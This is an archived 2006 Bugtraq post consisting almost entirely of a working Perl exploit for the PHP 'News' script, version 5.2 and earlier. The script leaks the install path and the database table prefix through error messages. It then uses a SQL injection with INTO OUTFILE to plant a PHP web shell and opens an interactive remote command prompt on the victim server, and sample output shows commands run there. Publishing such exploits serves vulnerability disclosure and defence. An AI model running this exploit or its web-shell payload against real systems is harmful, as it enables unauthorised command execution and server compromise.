[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060629105622.8353.qmail@securityfocus.com>
Date: 29 Jun 2006 10:56:22 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: News <= 5.2 XSS, SQL Injection, Full Path Disclosure
#!/usr/bin/perl
#
# VulnScr: News version 5.2 and prior
# E-mail: contact@...cent-leclercq.com
# Web: www.vincent-leclercq.com
#
# Date: Thu June 29 12:01 2006
# Credits: DarkFig (gmdarkfig@...il.com)
# Vuln: XSS, Full Path Disclosure, SQL Injection
# Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =))
# Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 during the installation of the script)
#
#
# +-----------------------------------------+
# | News <= 5.2 SQL Injection (cmd exec) ---|
# +-----------------------------------------+
# [+]Full path: OK [/home/www/victim/news52]
# [+]Prefix: OK [news_]
# [+]File exist: OK
# [localhost]uname -a
# Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 GNU/Linux
# [localhost]exit
# +-----------------------------------------+
#
use LWP::UserAgent;
use LWP::Simple;
use Getopt::Long;
#
# Argvs
#
header();
if(!$ARGV[1]){ &usageis; }
GetOptions( 'host=s' => \$host,
'path=s' => \$path,
);
if($host =~ /http:\/\/(.*)/){
$host = $1;
}
#
# Vars
#
my $helurl = 'http://'.$host.$path;
my $uagent = 'Perlnamigator';
my $timeut = '30';
my $errr00 = "[-]Can't connect to the host\n";
my $errr01 = "[-]Can't get the full path of the website\n";
my $errr02 = "[-]Can't get the table prefix\n";
my $errr03 = "[-]The php file doesn't exist\n";
#
# Client
#
my $client = LWP::UserAgent->new();
$client->agent($uagent);
$client->timeout($timeut);
#
# First step: Determine the installation path.
#
$req1 = $client->post($helurl.'index.php', Content => ['mail[]' => 'root\@localhost.com', 'submit' => 'S%27inscrire'],) or print $errr00 and the_end();
if($req1->as_string =~ /in <b>(.*?)\/configuration\/head.php<\/b>/) {
$fullpath = $1;
print "[+]Full path: OK [$fullpath]\n";
$fullpath .= "/admin/smileys/hello.php";
} else {
print $errr01;
the_end();
}
#
# Second step: Determine the table prefix.
#
$req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR');
if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) {
$prefixe = $1;
print "[+]Prefix: OK [$prefixe]\n";
} else {
print $errr02;
the_end();
}
#
# Third step: Create a php file (system($cmd))
#
$inject = "%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23";
$req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print $errr00 and the_end();
#
# Fourth step: file_exists()? yes ! enjoy =)
#
$req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end();
print "[+]File exist: OK\n";
&commandexec;
#
# Subroutines
#
sub commandexec {
while(1 ne 2) {
print "[$host]"; chomp($cmd = <STDIN>);
if($cmd eq "exit"){ &the_end; }
$req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and the_end();
print $req5, "\n";
}}
sub usageis {
print "| Usage: -host localhost -path /news/ ---| \n";
&the_end;
}
sub the_end {
print "+-----------------------------------------+\n";
exit;
}
sub header {
print "\n+-----------------------------------------+\n";
print "| News <= 5.2 SQL Injection (cmd exec) ---|\n";
print "+-----------------------------------------+\n";
}
Powered by blists - more mailing lists